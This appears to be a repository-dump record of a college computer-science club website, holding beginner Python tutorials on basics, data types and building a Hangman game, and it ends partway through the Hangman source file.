repo_name
stringlengths 5
114
| repo_url
stringlengths 24
133
| snapshot_id
stringlengths 40
40
| revision_id
stringlengths 40
40
| directory_id
stringlengths 40
40
| branch_name
stringclasses 209
values | visit_date
timestamp[ns] | revision_date
timestamp[ns] | committer_date
timestamp[ns] | github_id
int64 9.83k
683M
⌀ | star_events_count
int64 0
22.6k
| fork_events_count
int64 0
4.15k
| gha_license_id
stringclasses 17
values | gha_created_at
timestamp[ns] | gha_updated_at
timestamp[ns] | gha_pushed_at
timestamp[ns] | gha_language
stringclasses 115
values | files
listlengths 1
13.2k
| num_files
int64 1
13.2k
|
---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
cyfaircs/cyfaircs.github.io
|
https://github.com/cyfaircs/cyfaircs.github.io
|
216f0cb1d24f126afa0033bc1d9da521365a2114
|
ca3cccd6c568f3f0026456a1f0185a09809a7942
|
9ec3a1f5aaf1c46fea5b2db235c4082f87b0aa7d
|
refs/heads/main
| 2022-09-12T02:11:32.653575 | 2022-09-01T15:04:00 | 2022-09-01T15:04:00 | 42,316,086 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.7230145335197449,
"alphanum_fraction": 0.7302206754684448,
"avg_line_length": 58.47321319580078,
"blob_id": "f6f197b6e92c6f0c18c6bf6a20951f1ce50a97d3",
"content_id": "d5b3f4b6ed86d9b3a26ad4ad9e946bfe568960d7",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 6661,
"license_type": "no_license",
"max_line_length": 717,
"num_lines": 112,
"path": "/articles/intro/index1.md",
"repo_name": "cyfaircs/cyfaircs.github.io",
"src_encoding": "UTF-8",
"text": "\n<figcaption>Author: Amr Ojjeh</figcaption>\n<figcaption>Cover By: Amr Ojjeh</figcaption>\n<figcaption>Last updated: June 6, 2021</figcaption>\n\n# Intro to Python\nIf you've not read the previous article, I encourage you to go [back](index.html) and read it.\n\nThis is the first of many articles. The goal of these articles is to introduce you to Python quick and easy, and by the end of these articles, you should have written your first game, Hangman! But first, we must cover the basics.\n\n## Installation\nInstalling Python is relatively simple. Head to the website at [python.org](https://www.python.org/), and go through the installation process.\n\nUsing Python should be just as easy. If you're on Windows, you can open `cmd`, otherwise, you can open the `terminal`. Type `py` or `python`, then press enter. You should be prompted with something like:\n\n\t:::\n\tPython 3.8.6 (tags/v3.8.6:db45529, Sep 23 2020, 15:37:30) [MSC v.1927 32 bit (Intel)] on win32\n\tType \"help\", \"copyright\", \"credits\" or \"license\" for more information.\n\t>>>\n\nIf you were not prompted with this, then please contact one of our officers, and we'll be ready to help. If you also don't wish to install Python, then feel free to use [repl.it](https://repl.it).\n\n## Hello World\nWhat you just opened is what's called the \"REPL.\" That is, \"Read, Eval, Print, Loop.\" Simply, it means that Python will read your input, evaluate it, print the result, and then keep repating that process until you quit the program.\n\nLet's print something in the REPL! If you don't already have it open, just as before, you can open it by either typing `py` or `python` in the terminal.\n\n\t:::python\n\t>>> print(\"Hello World!\")\n\tHello World!\n\t>>>\n\nWhat we just did, is we invoked the `print` function, which simply prints the characters we give it. Like a regular math function, we use paranthesis to denote what we're passing to the function. Think of `f(x) = 2x`. To evaluate the function where `x = 2`, we write: `f(2)`. Similiarily, `print` is a function which requires a paramater similar to `x`, and we pass it the value we want the function to print.\n\nThe value, `Hello World!`, is in quotes because it's what we call a `string`. It has that name because it could be thought of as a string of characters, and the reason why strings require quotes is simply to let the program know that we're not writing code, and as such, whatever is inside the string is arbitrary. For instance, we could've also written:\n\n\t:::python\n\t>>> print(\"gasjgaklsjg\")\n\tgasjgaklsjg\n\t>>>\n\nAnd it would work the same way.\n\n## How are you?\nBy introducing two features, we can write a program which greets the user after they input their name.\n\n### Input\nTo do this, as the program implies, we must take input. This can be done easily:\n\n\t:::python\n\t>>> input(\"Enter your name: \")\n\tEnter your name: Amr\n\t'Amr'\n\t>>>\n\nThere are two interesting behaviors to note. For one, the program pauses until I enter some text and hit enter. Secondly, after I do that, `'Amr'` is printed, even though we never used the `print` function.\n\nThe program pauses because that is what `input` does, it takes input, and it'll wait until it has the user's input. `'Amr'` is printed because, unlike `print`, `input` *returns* a value. This means that the `input` function is substituted with the user's input. Recall the math analogy, where `f(x) = 2x`. If we invoke `f(x)` as `f(2)`, then that value *can* be substited with its evaluation, `2(2)`, or just `4`. Where the analogy falls apart, is that functions don't always need to return a useful value. Also, function *must* be substitued by the value returned. In this case, `'Amr'` is the returned value. Note the single quotes, they are equivalent to double quotes, which indicate that the value is a `string`.\n\n### Variables\nWe have a way to retrieve the input, but to reference it, we must store it. Doing this is also simple:\n\n\t:::python\n\t>>> name = input(\"Enter your name: \")\n\tEnter your name: Amr\n\t>>> name\n\t'Amr'\n\t>>>\n\n`name` could've been anything. We could've called the variable `boogalo`, but `name` is the most appropriate. Notice, that `'Amr'` is no longer printed after we run `input`. This is because the result is stored in `name`, and the assignment operator, `=`, does not return any value, it only assigns a value.\n\nWe can reference the name stored by simply typing the variable name, as seen above. And we can intuitively use the `+` sign to add to the string, called concatinating. This, however, does not change `name`. To change it, we must use the assignment operator, `=`, again. \n\n\t:::python\n\t>>> name + \"!\"\n\t'Amr!'\n\t>>> name\n\t'Amr'\n\n### Completing the Program\nNow we should be able to greet the user!\n\n\t:::python\n\t>>> name = input(\"Enter your name: \")\n\tEnter your name: Amr\n\t>>> print(\"Hello \" + name + \"!\")\n\tHello Amr!\n\t>>>\n\nThere's an obvious catch with the REPL. To run out program, we must supply it the code as we carry out the program. This does not make for a great user experience, and that is one of the reasons why we use scripts. All a script is, is the code we just wrote, but instead of constantly writing it, we can save it in a file that ends with `.py`.\n\nSo, using notepad, or whatever editor you prefer to use, you can write and save the following code as `greetings.py`, or whichever name you prefer to give your file.\n\n\t:::python\n\tname = input(\"Enter your name: \")\n\tprint(\"Hello \" + name + \"!\")\n\nYou may run the program now by either running `py greetings.py` or `python greetings.py` in your terminal. Note, that the terminal's current directory must be the same one the location of the file. You can change your directory with the command `cd`. Also note that the terminal is unrelated to Python, and is simply how we run Python.\n\nFrom now on, all examples will be shown as if they were written and saved in a file. You are still encouraged, however, to the use the REPL for whenever you are experimenting, since you can run any python code without the hassle of saving.\n\n## Exercise\nWrite a program which asks the user for their age, and print how old they would be in 10 years. To do this, you must use the `int` and `str` functions as such: \n\n\t:::python\n\tsome_number = int(input(\"Enter some number: \")) # Converts the string to an integer\n\tprint(\"Is this your number? \" + str(some_number)) # Convers the integer to a string\n<figcaption markdown=\"span\">More on these two functions will be written about [later](index3.html)</figcaption>\n\n(Feel free to Google or ask for help! Always expect more examples in the upcoming articles, in the case you don't fully get something.)\n\nWhen you're ready, you can read start reading the [next](index2.html) article.\n"
},
{
"alpha_fraction": 0.8148148059844971,
"alphanum_fraction": 0.8148148059844971,
"avg_line_length": 26,
"blob_id": "c50bafb656a461850a32f9f945d51ddc9de14411",
"content_id": "25ae5877ec877cfd49079bce44f83cb1c9395624",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 27,
"license_type": "no_license",
"max_line_length": 26,
"num_lines": 1,
"path": "/README.md",
"repo_name": "cyfaircs/cyfaircs.github.io",
"src_encoding": "UTF-8",
"text": "# lonestarcyfair.github.io\n"
},
{
"alpha_fraction": 0.6420628428459167,
"alphanum_fraction": 0.6440767049789429,
"avg_line_length": 30.8161563873291,
"blob_id": "3a96d7980fb069193f1b3bdace264358cea2f78e",
"content_id": "4c974874767a7552aaf27412e39ea9b4325708d6",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 11421,
"license_type": "no_license",
"max_line_length": 535,
"num_lines": 359,
"path": "/articles/intro/index5.md",
"repo_name": "cyfaircs/cyfaircs.github.io",
"src_encoding": "UTF-8",
"text": "\n<figcaption>Author: Amr Ojjeh</figcaption>\n<figcaption>Cover By: Amr Ojjeh</figcaption>\n<figcaption>Last updated: August 16, 2021</figcaption>\n\n# Hangman\n\nIf you've not read the previous article, I encourage you to go [back](index4.html) and read it.\n\nWe'll now be writing hangman! When we're making a game, we have to ask, how do we represent our data?\n\n(To see the full source code, visit [here](https://github.com/cyfaircs/cyfaircs.github.io/blob/main/articles/intro/hangman.py))\n\n## Data\n\nAs we've mentioned before, we have all sorts of data types, but unfortunately, there's no \"Hangman\" type that's provided to us. As programmers, we have to compose the data types we have in order to be able to represent Hangman in memory. So, what kind of data does Hangman need?\n\nFirstly, there's the secret word. That's the word which the user would have to guess.\n\n\t:::python\n\tsecret = \"elephant\"\n<figcaption>We'll discuss selecting new random words later.</figcaption>\n\nWe also want the hangman himself. Note though, that the hangman will have a different art depending on how many incorrect guesses the user took. As such, we can depict Hangman in all his stages by using a list:\n\n\t:::py\n\tHANGMANPICS = [\"\"\"\n\t +---+\n\t | |\n\t |\n\t |\n\t |\n\t |\n\t=========\"\"\", \"\"\"\n\t +---+\n\t | |\n\t O |\n\t |\n\t |\n\t |\n\t=========\"\"\", \"\"\"\n\t +---+\n\t | |\n\t O |\n\t | |\n\t |\n\t |\n\t=========\"\"\", \"\"\"\n\t +---+\n\t | |\n\t O |\n\t /| |\n\t |\n\t |\n\t=========\"\"\", \"\"\"\n\t +---+\n\t | |\n\t O |\n\t /|\\ |\n\t |\n\t |\n\t=========\"\"\", \"\"\"\n\t +---+\n\t | |\n\t O |\n\t /|\\ |\n\t / |\n\t |\n\t=========\"\"\", \"\"\"\n\t +---+\n\t | |\n\t O |\n\t /|\\ |\n\t / \\ |\n\t |\n\t=========\"\"\"]\n<figcaption markdown=\"span\">You can see how the hangman looks on your terminal by printing him out with `print(HANGMANPICS[0])`</figcaption>\n\nWe also want to store the letters guessed correctly, and the letters guessed incorrectly.\n\n\t:::python\n\tcorrect_letters = []\n\tincorrect_letters = []\n<figcaption markdown=\"span\">The `[]` means it's an empty list. We'll be appending letters as the user guesses.</figcaption>\n\nWith that, we have all the data that we need! Notice how we can describe the state of the game with just these variables. This will make programming the game itself much easier.\n\nHere's what the code should look like as of now:\n\n\t:::python\n\tsecret = \"elephant\"\n\n\tHANGMANPICS = [\"\"\"\n\t +---+\n\t | |\n\t |\n\t |\n\t |\n\t |\n\t=========\"\"\", \"\"\"\n\t +---+\n\t | |\n\t O |\n\t |\n\t |\n\t |\n\t=========\"\"\", \"\"\"\n\t +---+\n\t | |\n\t O |\n\t | |\n\t |\n\t |\n\t=========\"\"\", \"\"\"\n\t +---+\n\t | |\n\t O |\n\t /| |\n\t |\n\t |\n\t=========\"\"\", \"\"\"\n\t +---+\n\t | |\n\t O |\n\t /|\\ |\n\t |\n\t |\n\t=========\"\"\", \"\"\"\n\t +---+\n\t | |\n\t O |\n\t /|\\ |\n\t / |\n\t |\n\t=========\"\"\", \"\"\"\n\t +---+\n\t | |\n\t O |\n\t /|\\ |\n\t / \\ |\n\t |\n\t=========\"\"\"]\n\n\tcorrect_letters = []\n\tincorrect_letters = []\n\n\n## The Game Loop\n\nWe're able to describe the game with data, but now we need to actually code the game. To do so, we need to think about how the game will work from the user's perspective. We can do this by writing what should the experience be when playing the game. Here's what I'm thinking:\n\n\t'e' was a good guess!\n\t +---+\n\t | |\n\t O |\n\t /| |\n\t |\n\t |\n\t=========\n\n\tIncorrect guesses: z, x, y\n\tWord: e _ e _ _ _ _ _\n\tEnter your guess:\n\n\nWhen the user enters their guess, the screen should clear, then print whether the guess was correct or incorrect, draw the new hangman picture, as well as the incorrect guesses and the word, and finally, it should once again prompt the user, unless there were too many incorrect guesses, or the word was guessed completely.\n\n### Asking for Input\n\nWe as the programmer have a choice to pick any part of that cycle and start working on it. After we finish one part, we can add the next. Because I want to be able to test the game asap, I'll be working on the input functionality. Here's how we'd go about that:\n\n\t:::py\n\tdef prompt_user():\n\t\tletter = input(\"Enter your guess: \")\n\t\treturn letter\n\nThis code might look like it's enough, however, I ask you, what if the user enters a number? What if they enter multiple letters? What if they enter nothing at all? Those are cases we must handle if we wish our game to work consistently and without breaking. Here's how we do this:\n\n\t:::py\n\tdef prompt_user():\n\t\t# For now, take it for granted that \"TEST\".lower()\n\t\t# will return \"test\".\n\t\tletter = input(\"Enter your guess: \").lower()\n\t\tif len(letter) != 1:\n\t\t\tprint(\"Your guess must only be one letter!\")\n\t\t\treturn prompt_user() # We prompt the user again\n\t\telif letter < 'a' or letter > 'z':\n\t\t\tprint(\"Your guess must be an English letter!\")\n\t\t\treturn prompt_user()\n\t\treturn letter\n\nTo keep this article short, I advise you to look at this code carefully and ask what the purpose of each line is.\n\n### Checking correctness of input\n\nNow that we have the input, we should check if it's correct or not. If it isn't, we add it to the incorrect list of letters. If it is, we can add it to the correct list.\n\n\t:::py\n\tdef check_guess(letter):\n\t\tif letter in secret:\n\t\t\t# Just as lower, I insist that\n\t\t\t# you take .append for granted as well.\n\t\t\t# It simply means to add a single value to the list\n\t\t\tcorrect_letters.append(letter)\n\t\t\treturn True\n\t\telse:\n\t\t\tincorrect_letters.append(letter)\n\t\t\treturn False\n\nAgain, we must ask ourselves, is this enough? What if the user enters a letter they've already guessed before? Should we have duplicates in our list? As programmers, we must have an answer to these questions, otherwise, we do not know what our own program does. At its current state, lists can have duplicate letters, and users can correctly guess the same letter twice, as well as fail the same way twice. In my version of Hangman, I'd consider that impossible, so here's how I rectify the function:\n\n\t:::py\n\tdef check_guess(letter):\n\t\tif letter in correct_letters or letter in incorrect_letters:\n\t\t\t# There's a better way of doing this, which\n\t\t\t# I'll introduce another time, but for now, None is not\n\t\t\t# a bad way to indicate that the letter's been guessed before.\n\t\t\treturn None\n\t\tif letter in secret:\n\t\t\tcorrect_letters.append(letter)\n\t\t\treturn True # Correct guess\n\t\tincorrect_letters.append(letter)\n\t\treturn False # Incorrect guess\n<figcaption markdown=\"span\">Notice how we do not have an else anymore. This is because the `else` would be redundant, since if the prior `if` were to be true, the function would return True, and it would not proceed to complete the remainder of the code.</figcaption>\n\nNote also that we did not print anything in the function `check_guess`. This is to keep most of the printing in one place, so that our code is organized.\n\n### Win Condition\n\nThe game must eventually come to an end. This is done through a win, or a loss condition. Let's write a function which checks for that:\n\n\t:::py\n\tdef unique_letters(word):\n\t\tunique = []\n\t\tfor i in word:\n\t\t\tif not (i in unique):\n\t\t\t\tunique.append(i)\n\t\treturn unique\n\n\tdef win_condition():\n\t\tif len(incorrect_letters) == len(HANGMANPICS) - 1:\n\t\t\treturn False # User has lost\n\t\tif len(correct_letters) == len(unique_letters(secret)):\n\t\t\treturn True # User has won\n\t\treturn None # User has neither won or lost. Game is still going.\n\nI'll leave it as an exercise for you to understand the logic of these two functions.\n\n### Writing the Main Loop\n\n\t:::py\n\tdef start_game():\n\t\tprint(HANGMANPICS[len(incorrect_letters)])\n\t\tguess = prompt_user()\n\t\tis_correct = check_guess(guess)\n\t\tif is_correct == None:\n\t\t\tprint(\"You've already made the guess \" + guess + \"!\")\n\t\telif not is_correct:\n\t\t\tprint(guess + \" was incorrect!\")\n\t\telse:\n\t\t\tprint(guess + \" was a good guess!\")\n\t\tstart_game()\n\nWe're almost there! We've defined all the functions that we need, so now we just need to call the `start_game` function to start our game. We can do this by calling the function at the end of the file, after all the functions have been defined. The hangman picture updates, the program is able to tell the difference between a good guess and a bad guess, but, we can't win or lose yet, and if we do lose, the program crashes. Also, it's the same secret word everytime, and the screen doesn't clear. Those are simple additions, however.\n\n### Final Touches\n\nAdding the win condition should be easy, as we've already defined the functions which we need for the logic to work. So, we just need to write two new functions that will print the lose or win screen, and write the logic in `start_game`:\n\n\t:::py\n\tdef win_screen():\n\t\tprint(HANGMANPICS[len(incorrect_letters)])\n\t\tprint(\"You won! The secret word was: \" + secret)\n\n\tdef lose_screen():\n\t\tprint(HANGMANPICS[-1])\n\t\tprint(\"You lost! The secret word was: \" + secret)\n\n\tdef start_game():\n\t\tif win_condition() != None:\n\t\t\tif win_condition():\n\t\t\t\twin_screen()\n\t\t\t\treturn\n\t\t\telse:\n\t\t\t\tlose_screen()\n\t\t\t\treturn\n\t\t# ...\n\nSelecting a random word requires us to *import* new functionality. I won't go too much about how this works, but you can write `from random import randint`. This will provide us with a function called `randint`, a function which we don't have to define, similar to how we don't have to define `print` or `input`.\n\nWe can now generate the secret word instead of assigning it `\"elephant\"`:\n\t\n\t:::py\n\twords = [\"ant\",\"baboon\",\"badger\",\"bat\",\"bear\",\"beaver\",\"camel\",\"cat\",\"clam\",\"cobra\",\"cougar\",\"coyote\",\"crow\",\"deer\",\"dog\",\n\t\"donkey\",\"duck\",\"eagle\",\"ferret\",\"fox\",\"frog\",\"goat\",\"goose\",\"hawk\",\"lion\",\"lizard\",\"llama\",\"mole\",\"monkey\",\"moose\",\n\t\"mouse\",\"mule\",\"newt\",\"otter\",\"owl\",\"panda\",\"parrot\",\"pigeon\",\"python\",\"rabbit\",\"ram\",\"rat\",\"raven\",\"rhino\",\"salmon\",\n\t\"seal\",\"shark\",\"sheep\",\"skunk\",\"sloth\",\"snake\",\"spider\",\"stork\",\"swan\",\"tiger\",\"toad\",\"trout\",\"turkey\",\"turtle\",\"weasel\",\n\t\"whale\",\"wolf\",\"wombat\",\"zebra\"]\n\tsecret = words[randint(0, len(words) - 1)]\n\n`randint` will generate a random number between 0 and the length of the words list minus 1, and then use that number to select a random word from the words list.\n\nSimilarily, to clear the screen, we can `import os` and `import sys` at the top of the file, then define the function `clear` so that we can invoke it during our game loop:\n\t\n\t:::py hl_lines=\"10\"\n\tdef clear():\n\t\tif sys.platform == \"win32\":\n\t\t\tos.system(\"cls\")\n\t\telse:\n\t\t\tos.system(\"clear\")\n\n\tdef start_game():\n\t\t# ...\n\t\tguess = prompt_user()\n\t\tclear()\n\t\t# ...\n\n### Exercise\nThe game is completed! Mostly. If you look back at our vision, \n\n\t'e' was a good guess!\n\t +---+\n\t | |\n\t O |\n\t /| |\n\t |\n\t |\n\t=========\n\n\tIncorrect guesses: z, x, y\n\tWord: e _ e _ _ _ _ _\n\tEnter your guess:\n\nyou will see that we don't print the incorrect guesses, or the secret word as it's being filled. Writing those functions will be your exercise! The game loop should look like this after you're done:\n\n\t:::py hl_lines=\"10 11\"\n\tdef start_game():\n\t\tif win_condition() != None:\n\t\t\tif win_condition():\n\t\t\t\twin_screen()\n\t\t\t\treturn\n\t\t\telse:\n\t\t\t\tlose_screen()\n\t\t\t\treturn\n\t\tprint(HANGMANPICS[len(incorrect_letters)])\n\t\tprint_incorrect_guesses()\n\t\tprint_secret_word()\n\t\tguess = prompt_user()\n\t\tclear()\n\t\tis_correct = check_guess(guess)\n\t\tif is_correct == None:\n\t\t\tprint(\"You've already made the guess \" + guess + \"!\")\n\t\telif not is_correct:\n\t\t\tprint(guess + \" was incorrect!\")\n\t\telse:\n\t\t\tprint(guess + \" was a good guess!\")\n\t\tstart_game()\n\nGood luck and have fun!"
},
{
"alpha_fraction": 0.6925864815711975,
"alphanum_fraction": 0.7083247303962708,
"avg_line_length": 45.21052551269531,
"blob_id": "f7ab1bbbbb89f51d17c130d8b5c81e3ea5c0220d",
"content_id": "157210d533d92aa0dbce5f3a09f4efc47ced9c37",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 9658,
"license_type": "no_license",
"max_line_length": 612,
"num_lines": 209,
"path": "/articles/intro/index3.md",
"repo_name": "cyfaircs/cyfaircs.github.io",
"src_encoding": "UTF-8",
"text": "\n<figcaption>Author: Amr Ojjeh</figcaption>\n<figcaption>Cover By: Amr Ojjeh</figcaption>\n<figcaption>Last updated: June 6, 2021</figcaption>\n\n# Data Types\n\nIf you've not read the previous article, I encourage you to go [back](index2.html) and read it.\n\nThe goal of the series is to introduce the fundementals of programming, specifically in Python. We've covered if statements, and some basic input and output. However, there is one concept, the most important one, which I've avoided covering so far, and that is data types.\n\nRecall in our last two articles, we used the functions `str` and `int`, but I've never really explained what either one does. Also recall the equality operators, such as `>=` and `==`, what do they return? And what's the difference between a string or a number? This article should answer all these questions.\n\nI recommend you open your REPL alongside as you read this article, as you should execute any code shown here. A benefit of the repl is that you don't need to write `print` like I do in the code, as the REPL automatically prints the result (Read, Eval, **Print**, Loop).\n\n## Types\nBefore we explore what each type is, it's important that we talk about what is a type, first, and why they even exist.\n\nYou may have heard before that computers run on numbers. Everything is either a 0 or a 1, or as they say, in binary. Yet, how come you don't see this text as a string of numbers, but as English?\n\nThis question may arise, because the statement above, while true, is incomplete. Not only everything in memory is stored in binary, a row of 0s and 1s, but the way the numbers are *interpreted,* can vary.\n\nSuppose I give you a sticky note with the number 2 on it. This 2 on its own, means nothing. It *could* be denoting length, perhaps in meters, or it could be describing an area, maybe in ft<sup>2</sup>. However, until I specify what it represents, you are only left guessing.\n\nUnlike a human, though, a computer cannot guess. It must be told what each number represents, and that is what types do. A type \"integer,\" tells the computer that the number is a whole number. A type \"float\" indicates that the number has a fraction, such as 1.2. A \"string,\" is a bit more complicated (think of how many languages there are!), but essentially, it tells the computer that these number**s** represent characters. How strings, floats, and integers differ will not be covered in this series, as that's a rabbit hole of its own, but if I ever write an article on this matter, I'll provide a link here.\n\nThere are a ton more types which exist in Python, but to keep this short, I'll be covering the most important ones.\n\n## Numbers\nAs mentioned, there are two ways to represent numbers. They can either be an integer or float. An integer must be a whole number, while a float must have a fraction. You can observe the type of each variable or constant with the function `type`.\n\n\t:::py\n\ta = 2\n\tprint(type(a)) # <class 'int'>\n\tb = 2.2\n\tprint(type(b)) # <class 'float'>\n<figcaption>The integer type is often obreviated as \"int\"</figcaption>\n\nEach type comes with its own set of operations. The `+` sign, even though it's used with many different types, actually behaves differently depending on the types given. For now, the difference is minor, but you'll see a major difference when we get to [lists](#lists).\n\n\t:::python\n\ta = 2\n\tb = 2.2\n\tprint(type(b + b)) # <class 'float'>\n\tprint(type(a + a)) # <class 'int'>\n\tprint(type(a + b)) # <class 'float'>\n<figcaption markdown=\"span\">The `+` operator returns different types depending on the operands. When it's given an integer and a float, it convers the integer to a float.</figcaption>\n\nSubtraction and multipication behave similar to addition with respect to numbers, so they won't be covered.\n\nDivision, however, comes in two forms.\n\n\t:::python\n\ta = 4\n\tb = 3\n\tc = a / b\n\td = a // b\n\tprint(c) # 1.3333...\n\tprint(type(c)) # <class 'float'>\n\tprint(d) # 1\n\tprint(type(d)) # <class 'int'>\n\nA single slash, regardless of the operands, returns a float, while a double slash will truncate the fraction and return an int.\n\nNote that you should be careful when comparing floats, as they are sometimes approximates. For instance:\n\n\t:::python\n\tprint(.1 + .2) # 0.30000000000000004\n\nThis is due to the fact that numbers are stored in binary. This will be another topic for another time, however, as it goes beyond the scope of the series. If you require a workaround, message one of the officers. If you need an immediate solution, you can consult [Python's documentation](https://docs.python.org/3/library/math.html#math.isclose).\n\n## Lists\nIn life, everyone would like their cookies under a single container, and that's what lists do. You can store a series of related, or unrelated (though that's not recommended), values as a single value.\n\n\t:::python\n\twords = [\"lemon\", \"juice\", \"grape\", \"cow\", \"farm\", \"beer\", \"animal\", 32]\n\tprint(type(words)) # <class 'list'>\n\tprint(words[0]) # lemon\n\tprint(words[7]) # 32\n\tprint(words[-1]) # 32\n\tprint(words[-8]) # lemon\n\tprint([1, 2, 3, 4][0]) # 1\n\nWe can use the index operator, `[]`, to reference an item in the list. The first item is referenced by 0. Referencing an item which doesn't exist, such as `words[8]` or `words[-9]`, returns an error and halts the program. Referencing a negative index refers from the end of the list.\n\nWe can also change a value using the index operator:\n\n\t:::python\n\twords = [\"cat\", \"dog\"]\n\twords[0] = \"rat\"\n\tprint(words) # ['rat', 'dog']\n\nLists also utilize the `+` operation, but it has a different behavior. When two lists are added, they are appended.\n\n\t:::python\n\tsome_numbers = [1, 2, 3, 4]\n\tother_numbers = [5]\n\tprint(some_numbers + other_numbers + [1, 2, 3]) # [1, 2, 3, 4, 5, 1, 2, 3]\n\nAs with the `+`, lists also support multipication, `*`.\n\n\t::python\n\tprint([2, 3] * 4) # [2, 3, 2, 3, 2, 3, 2, 3]\n\nAn error is returned when a list is added to any other type.\n\nWe can remove an item or items in a list using the `del` keyword:\n\n\t:::python\n\ttest = [1, 2, 3, 4]\n\tdel test[0]\n\tprint(test) # [2, 3, 4]\n\tdel test[1:3]\n\tprint(test) # [2]\n\nYou can find the length of a list using the `len` function.\n\n\t:::python\n\tprint(len([1, 2, 3, 4, 5])) # 5\n\nFinally, we can retrieve a subset of the list using the colon, `:`, character:\n\n\t:::python\n\tprint([1, 2, 3, 4, 5][1:3]) # [2, 3]\n<figcaption>The \"3\" is exclusive. One way to think about it, is that 3 - 1 specifies the length of the list, starting from index 1.</figcaption>\n\n## Strings\nStrings are very similar to lists, except they are immutable, meaning they cannot be changed. And they are initialized by quotes (single or double) instead of brackets.\n\n\t:::python\n\tprint(type(\"Hello!\")) # <class 'str'>\n\ttest = 'cool!'\n\t# test[0] = \"d\" # ERROR: NOT ALLOWED\n\tprint(test[0]) # c\n\tprint(test[1:3]) # oo\n\tprint(test + \"!\") # cool!!\n\tprint(test * 3) # cool!cool!cool!\n\tprint(len(test)) # 5\n\nThere are also multiline strings. If you notice, if you try to press enter in the middle of a string to add a new line, Python will crash. There are ways to get around this, but for now, you can use multiline strings, which allow for tabs and newlines (the enter). To make a multiline string, which to be clear, are just strings, you use three double quotes or single quotes instead of just one:\n\n\t:::python\n\ttest = \"\"\"\n\tThat\n\tIs\n\tCool\n\t\"\"\"\n\ttest2 = '''\n\twow\n\t'''\n\tprint(test)\n\tprint(test2)\n\n## Booleans\nBooleans can either be `True` or `False`. Operators which return booleans are all the comparison operators, such as `==`, `<=`, `>`, `>=`, `!=`, etc..\n\n\t:::python\n\tfirst = True\n\tprint(type(first)) # <class 'bool'>\n\tprint(first) # True\n\tprint(first == True) # True\n\tprint(first != True) # False\n\tprint(3 > 2) # True\n\tprint(3 > 3) # False\n\tprint(3 >= 3) # True\n<figcaption markdown=\"span\">The `!=` means \"not equal to.\"</figcaption>\n\nVery importantly, if statements use booleans to judge whether they should run or not. You should also know that booleans have a lot of uniqeu operators, such as `not`, `and`, and `or`.\n\n\t:::python\n\tif True:\n\t\tprint(\"This will print no matter what\")\n\tif False:\n\t\tprint(\"This will never print\")\n\n\tif x > 2 and x < 4:\n\t\tprint(\"We're in the range!\")\n\nThe `and` operator means that both operands have to be `True` for `and` to also return `True`, otherwise it returns `False`.\n\nThe `or` operator means that only one of the operands have to be `True` for the expression to evaluate to `True`, otherwise it's `False`.\n\nThe `not` operator only takes one operand, and it always returns the opposite value. So, `not False` = `True`.\n\n## Casting\nNow we get to the functions `int`, `str`, `float`, and `list`. They should all make sense now. Say we have a string which we want to treat as an integer, how do we go about that? Assuming it's a valid string, i.e. there are no letters, we can use the `int` function to *cast* it.\n\n\t:::python\n\ttest = \"2\"\n\t# print(test + 2) # error\n\tprint(int(test) + 2) # 4\n\nThis is why we wrap our `input` with `int` when we're expecting an integer.\n\n\t:::python\n\tuser_input = int(input(\"Enter your number: \"))\n\nIf we would like a float instead of an int, we can use the `float` function. If you'd like to go from a number to a string, then you use the `str` function.\n\n\t:::python\n\tage = 24\n\tprint(\"My age is \" + str(24))\n\nThe `list` function is also important, but as its use cases have not become apparent yet, we will skip it for now.\n\n## Exercise\nGiven the user's input, return half the string they entered. For instance, if the user enters \"crazy\", the program should print \"cra\". If they enter \"lame\", the program should print \"la\".\n\nWhen you're ready, you can read start reading the [next](index4.html) article.\n"
},
{
"alpha_fraction": 0.528312087059021,
"alphanum_fraction": 0.5302085876464844,
"avg_line_length": 22.66025733947754,
"blob_id": "a486343c0c93e4a30e29fea48bb9257368dafcda",
"content_id": "bbcf58efd0430aab7d485d08f84cee4dddab8e37",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3691,
"license_type": "no_license",
"max_line_length": 122,
"num_lines": 156,
"path": "/articles/intro/hangman.py",
"repo_name": "cyfaircs/cyfaircs.github.io",
"src_encoding": "UTF-8",
"text": "import sys\nimport os\nfrom random import randint\n\ndef clear():\n if sys.platform == \"win32\":\n os.system(\"cls\")\n else:\n os.system(\"clear\")\n\nwords = [\"ant\",\"baboon\",\"badger\",\"bat\",\"bear\",\"beaver\",\"camel\",\"cat\",\"clam\",\"cobra\",\"cougar\",\"coyote\",\"crow\",\"deer\",\"dog\",\n\"donkey\",\"duck\",\"eagle\",\"ferret\",\"fox\",\"frog\",\"goat\",\"goose\",\"hawk\",\"lion\",\"lizard\",\"llama\",\"mole\",\"monkey\",\"moose\",\n\"mouse\",\"mule\",\"newt\",\"otter\",\"owl\",\"panda\",\"parrot\",\"pigeon\",\"python\",\"rabbit\",\"ram\",\"rat\",\"raven\",\"rhino\",\"salmon\",\n\"seal\",\"shark\",\"sheep\",\"skunk\",\"sloth\",\"snake\",\"spider\",\"stork\",\"swan\",\"tiger\",\"toad\",\"trout\",\"turkey\",\"turtle\",\"weasel\",\n\"whale\",\"wolf\",\"wombat\",\"zebra\"]\n\nsecret = words[randint(0, len(words) - 1)]\n\nHANGMANPICS = [\"\"\"\n +---+\n | |\n |\n |\n |\n |\n=========\"\"\", \"\"\"\n +---+\n | |\n O |\n |\n |\n |\n=========\"\"\", \"\"\"\n +---+\n | |\n O |\n | |\n |\n |\n=========\"\"\", \"\"\"\n +---+\n | |\n O |\n /| |\n |\n |\n=========\"\"\", \"\"\"\n +---+\n | |\n O |\n /|\\ |\n |\n |\n=========\"\"\", \"\"\"\n +---+\n | |\n O |\n /|\\ |\n / |\n |\n=========\"\"\", \"\"\"\n +---+\n | |\n O |\n /|\\ |\n / \\ |\n |\n=========\"\"\"]\n\ncorrect_letters = []\nincorrect_letters = []\n\ndef prompt_user():\n # For now, take it for granted that \"TEST\".lower()\n # will return \"test\".\n letter = input(\"Enter your guess: \").lower()\n if len(letter) != 1:\n print(\"Your guess must only be one 